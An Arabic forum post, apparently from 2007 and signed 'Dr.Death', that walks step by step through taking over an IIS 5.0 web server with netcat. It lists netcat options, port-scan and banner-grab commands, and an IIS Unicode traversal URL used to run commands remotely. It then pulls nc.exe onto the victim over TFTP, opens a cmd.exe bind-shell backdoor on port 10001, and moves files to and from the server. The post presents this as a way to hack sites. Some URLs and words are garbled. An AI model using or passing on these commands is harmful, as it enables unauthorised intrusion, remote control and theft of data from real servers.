عليكم ورحمة الله وبركاته...
اليوم بنتكلم عن موضوع خطير جدا اداة النت كات net cat والاختراق بواسطتها .
البرنامج اداه من ادوات الدوس , هي فالحقيقه موجوده فاليونكس , لكن يمكن انزلها للويندوز والتعامل معها .
النت كات عباره عن اداه قابلة للكتباه والقرائه عبر اتصالات الشبكات TCP و UDP .
ولها استخدامات كثيره جدا و خطيره , مثلا بورت سكان , التنصت على البورتات , والعمل باك دور .
لتحميل النت كات من هنا :اول شي بستعرض بعض اهم اوامر النت كات :-e specifies a program to exec after
making/receiving a connection
-g gateway source-routing hop point[s], up to 8
-G num source-routing oiter: 4, 8, 12
-i secs delay interval for lines sent, ports scanned
-l listen mode for inbound connections
-n only accept numeric IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize
-s addr local source address
-t netcat will respond to telnet option negotiation
"this allows it to connect to a telnetd and
get past initial negotiation far enough to get
a login prompt from the server"
-u UDP connection mode
-v verbose mode
-w secs wait - timeout for connects
-z zero I/O mode [used for scanning]
For NT netcat, all of the above options exist, plus a few others.
-d detach - don't open a new DOS window
-L keep listening after the current session terminates
بنتكلم عن طريق الاختراق بواسطة النت كات , والخطوات الي يجب ان نقوم بها :
-اولا البورت سكان :تقدر تسوي سكان على البورتات عن طريق هذا الامر : nc –v –z 192.168.1.90 1-200
او الامر هذا : nc –v –w2 –z 192.168.1.90 1-200
![[size=6]هذا برنامج سهل لضرب المواقع و السكيبلوكات ما عليك سو 1022figure1](https://2img.net/h/images.ientrymail.com/networknewz/1022figure1.gif)
192.168.1.90 هذا هو ايبي الجهاز او الموقع الي تبغي تسوي عليه بورت سكان .
طبعن علشان تطلع ايبي الموقع سو له ping ,. مثلا : ping
www.drdeathx.comالامر W2 هذا لتحديد مدة الاتصال , مثلا انا اخترت ثانيتين , اذا ماصار تجاوب يروح على البورت الي بعده , اختصار للوقت .
1-200 هذي هي البورتات الي سوينا سكان بينهم , انا اخترت البورتات من 1 الى 200 .
شوفو النتئائج شو طلعت لنا , بورت المتصفح والتلنت والاف تي بي وغيرهم . ومكتوب حذالهم البورت مفتوح وله لا .
-ثانيا الاتصال بالبورتات :مثلا عندنا موقع ونبغي نطلع معلومات عنه , مثل المعلومات الي يعطينا اياها موقع
www.netcraft.comبكل بساطه , نكتب الامر هذا : nc –v –n 192.168.1.90 80
![[size=6]هذا برنامج سهل لضرب المواقع و السكيبلوكات ما عليك سو 1022figure2](https://2img.net/h/images.ientrymail.com/networknewz/1022figure2.gif)
![[size=6]هذا برنامج سهل لضرب المواقع و السكيبلوكات ما عليك سو 1022figure3](https://2img.net/h/images.ientrymail.com/networknewz/1022figure3.gif)
الحين طلعنا معلومات عن البورت 21 و 80 , ولطع لنا ان الموقع شغال على ويندوز 2000 وعلى سيرفر IIS5.0 .و فيه ميكورسوفت FTP
حلو هذي معلومات بتفيدنا في تحديد الهدف للاختراق .
الحين بنشتغل شغل اجمد , وبنبدا فالتطبيق العملي , بنخترق الموقع .
بنخلي النت كات يفتح لنا باك دور فالموقع . طبعن لازم نحمل النت كات على الموقع اول شي علشان يفتح لنا الباك دور . كيف ؟؟
بما ان الموقع على سيرفر IIS5.0 , بنستخدم سكربتات اليونيكود الخطيره في رفعه .
![[size=6]هذا برنامج سهل لضرب المواقع و السكيبلوكات ما عليك سو 1022figure4](https://2img.net/h/images.ientrymail.com/networknewz/1022figure4.gif)
مثل ما تشوفون استخدمنا السكربت
http://192.168.1.90/scripts/..%255c....d.exe?/c+dir+c لاستعراض محتويات الدرايف C , عن طريق المجلد Scripts
وطلعت لنا النتائج : ********s and Settings , Inetpub , Program Files , WINNT
حلو , الحين بنرفع النت كات على سيرفر IIS
بنستخدم ال tftp , هذي الاداه مشابهه للاف تي بي , اكتب في الدوس tftp , اذا تبغي تعرف المزيد عنها .
نرجع الى موضوعنا :
![[size=6]هذا برنامج سهل لضرب المواقع و السكيبلوكات ما عليك سو 1022figure5](https://2img.net/h/images.ientrymail.com/networknewz/1022figure5.gif)
شوفو الاسكربت الي حطيناه هذي المره , نفس السكربت الاولي , لكن بدل امر الاستعراض dir , حطينا امر tftp , وطبقناه , هذي هي طريقه : TFTP [-i] host [GET | PUT] source [destination]
نحن في اختراقنا هذا الي سويناه : tftp –I 192.168.1.90 get nc.exe
طبعن في اسكربتات اليونيكود بدل المسافه نكتب +
فتصير بهذا الشكل :
http:///c+TFTP+-i+192.168.1.9+GET+nc.exeفي برنامج رائع اسمه TFTPD32 , يطلع لك اذا النت كات انرفع بنجاح للسيرفر
وصلة البرنامج :
http://perso.wanadoo.fr/philippe.jou...ftpd32.272.zipموقع البرنامج :
http://tftpd32.jounin.net![[size=6]هذا برنامج سهل لضرب المواقع و السكيبلوكات ما عليك سو Working_tftpd32](https://2img.net/h/perso.wanadoo.fr/philippe.jounin/images/working_tftpd32.jpg)
![[size=6]هذا برنامج سهل لضرب المواقع و السكيبلوكات ما عليك سو 1022figure6](https://2img.net/h/images.ientrymail.com/networknewz/1022figure6.gif)
الحين بنبدا فالشغل الحلو , بعد ما رفعنا النت كات وكل شي تمام , نبغي نخلي النت كات يفتح لنا باك دور (Back Door) .
علشان نخليه يفتح لنا الباك دور لازم نخليه فالاول يتنصت على بورت فالسيرفر , مثلا اخترت البورت 10001 , بعدين بنقدر نتصل بالبورت من جهازنا بستخدام النت كات .
انزين الحين بنطبق امر التنصت من السيرفر , هذا هو الامر : nc -L -p 10001 -d -e cmd.exe
نشرح شوية الاوامر هذي الي كتبناها :
Nc : يخلي الويندوز يشغل النت كات nc.exe
-L : يخبر النت كات بان لا يغلق وان ينتظر الانتصال
-p : لتحديد البورت الي بنتصنت عليه .
-d : يخبر النت كات بالتصال بالبرنامج الي نريد ان نشغله
-e : يخبر النت كات بالبرنامج الي نريده ان يشتغل بعد الاتصال بالبورت .
طبعن نحن اخترنا الدوس cmd.exe
الحين بنكتب الامر في سكربت اليونيكود , طبعن بيكون بهذا الشكل :
http:///c+nc+-L+-p+10001+-d+-e+cmd.exeشوفو الصوره :
![[size=6]هذا برنامج سهل لضرب المواقع و السكيبلوكات ما عليك سو 1022figure7](https://2img.net/h/images.ientrymail.com/networknewz/1022figure7.gif)
الحين تمام , النت كات تنصت على البورت 10001 , وفتح لنا باك دور على الدوس cmd.exe
الحين يا دورنا , علشان نتصل من جهازنا على النت كات الي على السيرفر .
![[size=6]هذا برنامج سهل لضرب المواقع و السكيبلوكات ما عليك سو 1022figure8](https://2img.net/h/images.ientrymail.com/networknewz/1022figure8.gif)
الحين مثل ما ملاحظين , بعد ما اتصلنا بالبورت المتنصتين عليه 10001 ,
بالامر nc –v –n 192.168.1.90 10001
دخلنا على ملف scripts الي فالسيرفر , وطبقنا الامر ipconfig , والنتيجه انه طلع لنا ايبي السيرفر (^_^)
الحين تمام صار عندنا تحكم بعيد على السيرفر .
الحين نبغي ننقل الملفات بواسطة النت كات , كيف ؟؟
نقدر عن طريق ال TFTP , لكن لازم نسويها مره ثانيه عن طريق اليونيكود , لكن ليش نحن خلاص تعاملنا الحين مع النت كات وهو افضل وعندنا اتصال خارجي معاه .
اول شي امر استقبال او سحب ملف من السيرفر , مثلا اذا كان فالسيرفر ملف اسمه hack.txt , ونبغي نسحبه , بنطبق هذا الامر : nc –l –p 1234 >hack.txt
1234 هذا هو البورت الي بنستخدمه في سحب الملف .
![[size=6]هذا برنامج سهل لضرب المواقع و السكيبلوكات ما عليك سو 1022figure9](https://2img.net/h/images.ientrymail.com/networknewz/1022figure9.gif)
انزين , واذا حبينا انا نرفع ملف للسيرفر , كيف ؟؟
عن طريق هذا الامر : nc 192.168.1.90 1234 <hack.txt , ^C
![[size=6]هذا برنامج سهل لضرب المواقع و السكيبلوكات ما عليك سو 1022figure10](https://2img.net/h/images.ientrymail.com/networknewz/1022figure10.gif)
الحين تمام , نستعرض محتوايات المجلد بالامر dir , ونتاكد ان كل شي تمام وان الملف انرفع .
وعلشان نشغل الملف في السيرفر , نستخدم الامر ! , hack.txt!
![[size=6]هذا برنامج سهل لضرب المواقع و السكيبلوكات ما عليك سو 1022figure12](https://2img.net/h/images.ientrymail.com/networknewz/1022figure12.gif)
![[size=6]هذا برنامج سهل لضرب المواقع و السكيبلوكات ما عليك سو 1022figure11](https://2img.net/h/images.ientrymail.com/networknewz/1022figure11.gif)
مبروك عليك الاختراق , والعمليه تمت بنجاح ...
اتمنى ان يكون الموضوع حاز على اعجابكم , واي استفسار انا حاظر .
تقبلو تحياتي كاتب الموضوع
Dr.Death
THE MAN OF THE DARK SIDE
++==============================++
جميع الحقوق محفوظة لدى كاتب الموضوع Dr.Death
اتمنى ذكر اسم كاتب الموضوع عند نقله
++==============================++
![[size=6]هذا برنامج سهل لضرب المواقع و السكيبلوكات ما عليك سو Empty](https://2img.net/i/empty.gif)
موضوع: [size=6]هذا برنامج سهل لضرب المواقع و السكيبلوكات ما عليك سو ![[size=6]هذا برنامج سهل لضرب المواقع و السكيبلوكات ما عليك سو I_icon_minitime](https://2img.net/s/t/10/04/47/i_icon_minitime.gif){kind=icon}
الأربعاء أغسطس 01, 2007 2:28 pm
